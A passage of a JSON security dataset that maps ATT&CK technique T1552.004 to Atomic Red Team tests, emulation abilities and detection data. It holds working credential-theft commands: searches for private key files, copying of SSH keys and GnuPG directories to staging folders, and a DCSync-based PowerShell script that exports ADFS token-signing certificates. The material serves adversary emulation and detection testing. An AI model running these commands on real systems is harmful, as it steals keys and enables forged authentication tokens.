(Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n", + "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n", + "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n", + "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;" + ], + "commands": [ + { + "command": "dir c:\\ /b /s .key | findstr /e .key\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "find / -name id_rsa >> #{output_file}\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "find #{search_path} -name id_rsa >> /tmp/keyfile_locations.txt\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec cp --parents {} /tmp/art-staging \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec rsync -R {} /tmp/art-staging \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/GnuPG\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} /tmp/GnuPG \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.004", + "display_name": "Unsecured Credentials: Private Keys", + "atomic_tests": [ + { + "name": "Private Keys", + "auto_generated_guid": "520ce462-7ca7-441e-b5a5-f8347f632696", + "description": "Find private keys on the Windows file system.\nFile extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dir c:\\ /b /s .key | findstr /e .key\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Discover Private SSH Keys", + "auto_generated_guid": "46959285-906d-40fa-9437-5a439accd878", + "description": "Discover private SSH keys on a macOS or Linux system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_file": { + "description": "Output file containing locations of SSH key files", + "type": "Path", + "default": "/tmp/keyfile_locations.txt" + } + }, + "executor": { + "command": "find #{search_path} -name id_rsa >> #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Copy Private SSH Keys with CP", + "auto_generated_guid": "7c247dc7-5128-4643-907b-73a76d9135c3", + "description": "Copy private SSH keys on a Linux system to a staging folder using the `cp` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "Path", + "default": "/tmp/art-staging" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "cleanup_command": "rm #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "Copy Private SSH Keys with rsync", + "auto_generated_guid": "864bb0b2-6bb5-489a-b43b-a77b3a16d68a", + "description": "Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "Path", + "default": "/tmp/art-staging" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "Copy the users GnuPG directory with rsync", + "auto_generated_guid": "2a5a0601-f5fb-4e2e-aa09-73282ae6afca", + "description": "Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing a copy of the .gnupg directory", + "type": "Path", + "default": "/tmp/GnuPG" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "ADFS token signing and encryption certificates theft - Local", + "auto_generated_guid": "78e95057-d429-4e66-8f82-0f060c1ac96f", + "description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals module must be installed.\n", + "prereq_command": "if (Get-Module AADInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "ADFS token signing and encryption certificates theft - Remote", + "auto_generated_guid": "cab413d8-9e4a-4b8d-9b84-c985bd73a442", + "description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfs_service_account_name": { + "description": "Name of the ADFS service account", + "type": "String", + "default": "adfs_svc" + }, + "replication_user": { + "description": "Username with replication rights. It can be the Domain Admin running the script", + "type": "String", + "default": "Administrator" + }, + "replication_password": { + "description": "Password of replication_username", + "type": "String", + "default": "ReallyStrongPassword" + }, + "adfs_server_name": { + "description": "Name of an ADFS server", + "type": "String", + "default": "sts.contoso.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals and ActiveDirectory modules must be installed.\n", + "prereq_command": "if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + }, + { + "id": "de632c2d-a729-4b77-b781-6a6b09c148ba", + "name": "Find private keys", + "description": "Find private keys on the file system", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.004", + "name": "Unsecured Credentials: Private Keys" + }, + "platforms": { + "windows": { + "psh": { + "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n" + }, + "cmd": { + "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n" + } + }, + "darwin": { + "sh": { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n" + } + }, + "linux": { + "sh": { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" 